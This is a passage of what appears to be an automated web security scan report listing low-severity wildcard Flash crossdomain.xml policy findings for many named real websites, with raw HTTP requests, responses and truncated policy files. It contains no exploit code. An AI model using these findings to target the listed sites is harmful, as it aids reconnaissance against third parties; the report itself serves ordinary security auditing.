Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.canada.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/xml; charset=utf-8
Content-Length: 527
Cache-Control: private, max-age=300
Date: Sat, 02 Apr 2011 13:41:16 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.canada.com" />
   <allow-access-from domain="*.mavenapps.net" />
   <allow-access-from domain="query.mcms.mavenapps.net" />
   <allow-access-from domain="*.maventechnologies.com" />
   <allow-access-from domain="*.maven.net" />
   <allow-access-from domain="www.househunting.ca" />
   <allow-access-from domain="*.househunting.ca" />
...[SNIP]...
7.194. http://www.candystand.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.candystand.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.candystand.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 24 Mar 2011 20:22:30 GMT
ETag: "a10a5-dc-49f403c958d80"
Accept-Ranges: bytes
Content-Length: 220
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:23:02 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.candystand.com"/>
</
...[SNIP]...
7.195. http://www.caranddriver.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.caranddriver.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.caranddriver.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.17 (Unix) DAV/2 PHP/5.2.6
Last-Modified: Tue, 17 Nov 2009 11:36:10 GMT
ETag: "69473e-ca-4788f88587e80"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: application/xml
Cache-Control: max-age=60
Date: Sat, 02 Apr 2011 14:03:34 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>

<cross-domain-policy>


<allow-access-from domain="*.hfmus.com" />

<allow-access-from domain="*.caranddriver.com" />


</cross-domain-policy>
...[SNIP]...
7.196. http://www.careerbuilder.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.careerbuilder.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.careerbuilder.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
Last-Modified: Wed, 19 Jan 2011 13:51:09 GMT
Accept-Ranges: bytes
ETag: "d62146eddfb7cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-PBY: REBEL14
Date: Sat, 02 Apr 2011 12:42:25 GMT
Connection: close
Content-Length: 842

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.careerbuilder.com" />
<allow-access-from domain="img.icbdr.com" />
<allow-access-from domain="img.cbdr.com" />
<allow-access-from domain="*.icbdr.com" />
<allow-access-from domain="*.cbdr.com" />
<allow-access-from domain="*.jobbguiden.se" />
<allow-access-from domain="*.jobbingmall.nl" />
<allow-access-from domain="*.careerbuilder.de" />
<allow-access-from domain="*.careerbuilder.no" />
<allow-access-from domain="*.careerbuilder.ch" />
<allow-access-from domain="*.kariera.gr" />
<allow-access-from domain="*.careerbuilder.gr" />
<allow-access-from domain="*.careerbuilder.fr" />
...[SNIP]...
7.197. http://www.careerrookie.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.careerrookie.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.careerrookie.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
Last-Modified: Wed, 19 Jan 2011 13:51:09 GMT
Accept-Ranges: bytes
ETag: "d62146eddfb7cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-PBY: BEAR21
Date: Sat, 02 Apr 2011 14:02:26 GMT
Connection: close
Content-Length: 842

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.careerbuilder.com" />
<allow-access-from domain="img.icbdr.com" />
<allow-access-from domain="img.cbdr.com" />
<allow-access-from domain="*.icbdr.com" />
<allow-access-from domain="*.cbdr.com" />
<allow-access-from domain="*.jobbguiden.se" />
<allow-access-from domain="*.jobbingmall.nl" />
<allow-access-from domain="*.careerbuilder.de" />
<allow-access-from domain="*.careerbuilder.no" />
<allow-access-from domain="*.careerbuilder.ch" />
<allow-access-from domain="*.kariera.gr" />
<allow-access-from domain="*.careerbuilder.gr" />
<allow-access-from domain="*.careerbuilder.fr" />
...[SNIP]...
7.198. http://www.carnival.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.carnival.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.carnival.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Fri, 28 Jan 2011 19:48:23 GMT
Accept-Ranges: bytes
ETag: "c4bc715224bfcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 218
Date: Sat, 02 Apr 2011 13:56:17 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.googlesyndication.com"/><allow-access-from domain="*.feedburner.com"/>
</cr
...[SNIP]...
7.199. http://www.cars.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cars.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cars.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:45 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 14 May 2009 14:15:36 GMT
ETag: "9c38-27a-f632f200"
Accept-Ranges: bytes
Content-Length: 634
P3P: policyref="/w3c/p3p.xml", CP="ALL DEM ONL PHY PUR CUR OUR BUS IND"
Connection: close
Content-Type: text/xml
Set-Cookie: cars_persist=3980465324.20480.0000; expires=Sat, 02-Apr-2011 14:08:01 GMT; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*.cars.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.2o7.net" />
...[SNIP]...
7.200. http://www.cartoonnetwork.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cartoonnetwork.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cartoonnetwork.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:47 GMT
Server: Apache
Last-Modified: Tue, 21 Dec 2010 13:56:44 GMT
Content-Length: 11666
Cache-Control: max-age=600
Expires: Sat, 02 Apr 2011 13:40:34 GMT
Content-Type: application/xml
Connection: close
X-Pad: avoid browser bug

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*.cartoonnet
...[SNIP]...
<allow-access-from domain="*.cartoonnetwork.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="cartoonnetwork.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cartoonnetwork.tv" />
   <allow-access-from domain="www.cartoonnetwork.tv" />
   <allow-access-from domain="cartoonnetwork.tv" />
   <allow-access-from domain="*.cartoonnetwork.us" />
   <allow-access-from domain="www.cartoonnetwork.us" />
   <allow-access-from domain="cartoonnetwork.us" />
   <allow-access-from domain="www.cartoon.co.jp" />
   <allow-access-from domain="cartoon.co.jp" />
...[SNIP]...
<allow-access-from domain="www.cartoonnetworkindia.com" />
   <allow-access-from domain="cartoonnetworkindia.com" />
...[SNIP]...
<allow-access-from domain="www.cartoonnetworkasia.com" />
   <allow-access-from domain="cartoonnetworkasia.com" />
   <allow-access-from domain="www.adultswim.com.au" />
   <allow-access-from domain="adultswim.com.au" />
   <allow-access-from domain="www.pogo.tv" />
   <allow-access-from domain="pogo.tv" />
   <allow-access-from domain="www.cartoonnetworkya.com" />
   <allow-access-from domain="cartoonnetworkya.com" />
   <allow-access-from domain="www.cartoonnetworkla.com" />
   <allow-access-from domain="cartoonnetworkla.com" />
...[SNIP]...
<allow-access-from domain="www.cartoonnetwork.cl" />
   <allow-access-from domain="cartoonnetwork.cl" />
   <allow-access-from domain="www.adultswimla.com" />
   <allow-access-from domain="adultswimla.com" />
   <allow-access-from domain="www.adultswim.com.ar" />
   <allow-access-from domain="adultswim.com.ar" />
   <allow-access-from domain="www.adultswim.cl" />
   <allow-access-from domain="adultswim.cl" />
   <allow-access-from domain="www.adultswim.com.mx" />
   <allow-access-from domain="adultswim.com.mx" />
   <allow-access-from domain="www.adultswim.com.ve" />
   <allow-access-from domain="adultswim.com.ve" />
   <allow-access-from domain="www.adultswim.com.br" />
   <allow-access-from domain="adultswim.com.br" />
   <allow-access-from domain="www.boomerangla.com" />
   <allow-access-from domain="boomerangla.com" />
   <allow-access-from domain="www.boomerang.com.mx" />
   <allow-access-from domain="boomerang.com.mx" />
   <allow-access-from domain="www.boomerang.com.ar" />
   <allow-access-from domain="boomerang.com.ar" />
   <allow-access-from domain="www.boomerang.com.br" />
   <allow-access-from domain="boomerang.com.br" />
   <allow-access-from domain="www.boomerang.com.ve" />
   <allow-access-from domain="boomerang.com.ve" />
   <allow-access-from domain="www.boomerang.cl" />
   <allow-access-from domain="boomerang.cl" />
...[SNIP]...
<allow-access-from domain="www.cartoonnetwork.fr" />
   <allow-access-from domain="cartoonnetwork.fr" />
   <allow-access-from domain="www.cartoonnetwork.es" />
...[SNIP]...
<allow-access-from domain="www.cartoonnetwork.it" />
   <allow-access-from domain="cartoonnetwork.it" />
   <allow-access-from domain="www.cartoonnetwork.pl" />
   <allow-access-from domain="cartoonnetwork.pl" />
   <allow-access-from domain="www.cartoonnetwork.nl" />
   <allow-access-from domain="cartoonnetwork.nl" />
   <allow-access-from domain="www.cartoonnetwork.nu" />
   <allow-access-from domain="cartoonnetwork.nu" />
   <allow-access-from domain="www.cartoonnetwork.se" />
   <allow-access-from domain="cartoonnetwork.se" />
   <allow-access-from domain="www.cartoonnetwork.dk" />
   <allow-access-from domain="cartoonnetwork.dk" />
   <allow-access-from domain="www.cartoonnetwork.ro" />
   <allow-access-from domain="cartoonnetwork.ro" />
   <allow-access-from domain="www.cartoonnetwork.hu" />
   <allow-access-from domain="cartoonnetwork.hu" />
   <allow-access-from domain="www.cartoonnetwork.de" />
   <allow-access-from domain="cartoonnetwork.hu" />
   <allow-access-from domain="www.cartoonnetworkhq.net" />
   <allow-access-from domain="cartoonnetworkhq.net" />
   <allow-access-from domain="www.cartoonnetworkeurope.com" />
   <allow-access-from domain="cartoonnetworkeurope.com" />
   <allow-access-from domain="www.boomerangtv.co.uk" />
   <allow-access-from domain="boomerangtv.co.uk" />
   <allow-access-from domain="www.boomerangtv.fr" />
   <allow-access-from domain="boomerangtv.fr" />
   <allow-access-from domain="www.boomerangtv.es" />
   <allow-access-from domain="boomerangtv.es" />
   <allow-access-from domain="www.toonami.co.uk" />
   <allow-access-from domain="toonami.co.uk" />
   <allow-access-from domain="aolsvc.cartoonnetwork.kol.aol.com" />
   <allow-access-from domain="kol.cartoonnetwork.com" />
   <allow-access-from domain="www.toonamijetstream.com" />
   <allow-access-from domain="toonamijetstream.com" />
   <allow-access-from domain="*.toonamijetstream.com" />
   <allow-access-from domain="www.tickleu.com" />
   <allow-access-from domain="tickleu.com" />
   <allow-access-from domain="*.tickleu.com" />
   <allow-access-from domain="*.adultswim.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="www.adultswim.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.adultstage.turner.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="adultstage.turner.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.dubitlimited.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="otis.turner.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.turner.com" secure="true" />
...[SNIP]...
<allow-access-from domain="staging.cartoonnetwork.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="aud-ite.cartoonnetwork.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="mmstage.cartoonnetwork.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="aud-ite.fusionfall.com" secure="false" />
...[SNIP]...
<allow-access-from domain="audience.cartoonnetwork.com" secure="false" />
...[SNIP]...
<allow-access-from domain="topscores.cartoonnetwork.com" secure="false" />
...[SNIP]...
<allow-access-from domain="s.cnn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.cnn.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.cnn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="ref-avtr.cartoonnetwork.com" secure="true" />
...[SNIP]...
<allow-access-from domain="mastercontrol.cartoonnetwork.com" />
   <allow-access-from domain="minimatch.cartoonnetwork.com" secure="false" />
...[SNIP]...
<allow-access-from domain="gamecreator.cartoonnetwork.com" secure="false" />
...[SNIP]...
<allow-access-from domain="gcstage.cartoonnetwork.com" secure="false" />
...[SNIP]...
<allow-access-from domain="www.fusionfall.com" />
   <allow-access-from domain="staging.fusionfall.com" />
   <allow-access-from domain="fusionfall.com" />
   <allow-access-from domain="clearspringcnn.blogspot.com" />
   <allow-access-from domain="*.clearspring.com" />
   <allow-access-from domain="*.cdn.turner.com" secure="true" />
...[SNIP]...
<allow-access-from domain="ht.cdn.turner.com" secure="true" />
...[SNIP]...
<allow-access-from domain="cnn-0.vo.llnwd.net" secure="true" />
...[SNIP]...
<allow-access-from domain="cnn-1.vo.llnwd.net" secure="true" />
...[SNIP]...
<allow-access-from domain="cnn-2.vo.llnwd.net" secure="true" />
...[SNIP]...
<allow-access-from domain="cnn-3.vo.llnwd.net" secure="true" />
...[SNIP]...
<allow-access-from domain="cnn-4.vo.llnwd.net" secure="true" />
...[SNIP]...
<allow-access-from domain="cnn-5.vo.llnwd.net" secure="true" />
...[SNIP]...
<allow-access-from domain="cnn-6.vo.llnwd.net" secure="true" />
...[SNIP]...
<allow-access-from domain="cnn-7.vo.llnwd.net" secure="true" />
...[SNIP]...
<allow-access-from domain="cnn-8.vo.llnwd.net" secure="true" />
...[SNIP]...
<allow-access-from domain="cnn-9.vo.llnwd.net" secure="true" />
...[SNIP]...
<allow-access-from domain="cnn.vo.llnwd.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="http-trd-ak.cdn.turner.com" secure="true" />
...[SNIP]...
<allow-access-from domain="http-trd-l3.cdn.turner.com" secure="true" />
...[SNIP]...
<allow-access-from domain="teg8devapp1.turner.com" />
   <allow-access-from domain="teg8frev1.turner.com" secure="false" />
...[SNIP]...
<allow-access-from domain="www.cryptidsarereal.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cryptidsarereal.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="redesign.cartoonnetwork.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="i.cartoonnetwork.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="pollserver.cartoonnetwork.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.addictinggames.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.miniclip.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.roblox.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.wildtangent.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="gts.dartmotif.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cartoonnetwork.moxieinteractive.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cn.moxieinteractive.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*nbakidsp1dev1.turner.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.funnygarbage.com" secure="false"/>
...[SNIP]...
7.201. http://www.casttv.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.casttv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.casttv.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 02 Apr 2011 13:45:50 GMT
Content-Type: text/xml; charset=utf-8
Content-Length: 219
Last-Modified: Tue, 10 Jun 2008 19:51:24 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.casttv.com" />
</c
...[SNIP]...
7.202. http://www.cbc.ca/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cbc.ca
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cbc.ca

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 31 Mar 2011 19:58:16 GMT
ETag: "cc015-1aa-b6cee600"
X-Origin-Server: web23:sb10
Content-Type: text/xml
Date: Sat, 02 Apr 2011 14:00:02 GMT
Content-Length: 426
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- $Id: cbc.ca-crossdomain.xml 900 2010-01-25 14:26:10Z dunnj $ -->
<cross-
...[SNIP]...
<allow-access-from domain="*.cbc.ca" />
<allow-access-from domain="*.mavenapps.net"/>
<allow-access-from domain="*.cbcmediasales.ca"/>
<allow-access-from domain="*.qa.nm.cbc.ca"/>
...[SNIP]...
7.203. http://www.cbsnews.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cbsnews.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cbsnews.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "1b334cb-5ef-4889f0a0bdfdd"
Last-Modified: Wed, 09 Jun 2010 20:49:16 GMT
Accept-Ranges: bytes
Content-Length: 1519
Content-Type: application/xml
Cache-Control: max-age=300
Expires: Sat, 02 Apr 2011 13:29:11 GMT
Date: Sat, 02 Apr 2011 13:24:11 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="cbsnews.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cbsnews.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cbs.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.cbsnews.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.cbs.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.cbsnew.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="wwwimage.cbsnews.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="cgi.cbsnews.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="video.cgi.cbsnews.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cbssports.com"/>
<allow-access-from domain="*.cbsinteractive.com"/>
<allow-access-from domain="*.cnet.com"/>
<allow-access-from domain="*.cnettv.com"/>
<allow-access-from domain="cgi.cbs.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="video.cgi.cbs.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.sportsline.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.sportsline.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.sportsline.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cooliris.com" to-ports="*" secure="false"/>
...[SNIP]...
7.204. http://www.chacha.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.chacha.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.chacha.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: sessionId=MjFhZDhhZmYtZTdkMS00NTVkLWEwMzUtZWNkOGZiMGY3Yzg5o6b4; Expires=Sat, 23-Apr-2011 08:43:29 GMT; Path=/
Set-Cookie: sessionId=OTkxNTVhMmUtYWNkNS00MDdmLWJmNTUtYzk5ODAwOGJlMTg2o6b4; Expires=Sat, 23-Apr-2011 08:43:29 GMT; Path=/
Set-Cookie: wuid=NDE0Y2Q4MWYtYjM4ZC00NGM5LThhNDAtMjc4M2E1NmEzOWNho6b4; Expires=Sun, 01-Apr-2012 12:43:29 GMT; Path=/
Set-Cookie: seenUser=dHJ1ZQ%3D%3Do6b4; Expires=Fri, 01-Jul-2011 12:43:29 GMT; Path=/
Set-Cookie: sessionId=MjZhOWMxODMtYTllMy00YTViLTg5NDktNGVhZjJkNDZhMGJjo6b4; Expires=Sat, 23-Apr-2011 08:43:29 GMT; Path=/
Content-disposition: inline
Content-Type: text/xml;charset=UTF-8
Content-Language: en-US
Content-Length: 297
Date: Sat, 02 Apr 2011 12:43:28 GMT
Connection: close

<cross-domain-policy>

<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.chacha.bz" secure="false"/>
<allow-access-from domain="*.chacha.com" secure="false"/>
   <
...[SNIP]...
7.205. http://www.charlotteobserver.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.charlotteobserver.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.charlotteobserver.com

Response

HTTP/1.0 200 OK
Server: Apache/1.3.41
Last-Modified: Thu, 17 Dec 2009 22:05:10 GMT
ETag: "ea0d60-df-4b2aab16"
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:58:32 GMT
Content-Length: 223
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.charlotteobserver.com" />

...[SNIP]...
7.206. http://www.chemistry.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.chemistry.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.chemistry.com

Response

HTTP/1.1 200 OK
Content-Length: 296
Content-Type: text/xml
Last-Modified: Tue, 30 Jan 2007 22:50:53 GMT
Accept-Ranges: bytes
ETag: "6cb05b18c144c71:53b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:43:53 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.chemistry.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.match.com" secure="true" />
...[SNIP]...
7.207. http://www.chevrolet.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.chevrolet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.chevrolet.com

Response

HTTP/1.0 200 OK
Server: Apache
X-Pillar-Name: VAPROD
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:50:52 GMT
Content-Length: 4088
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
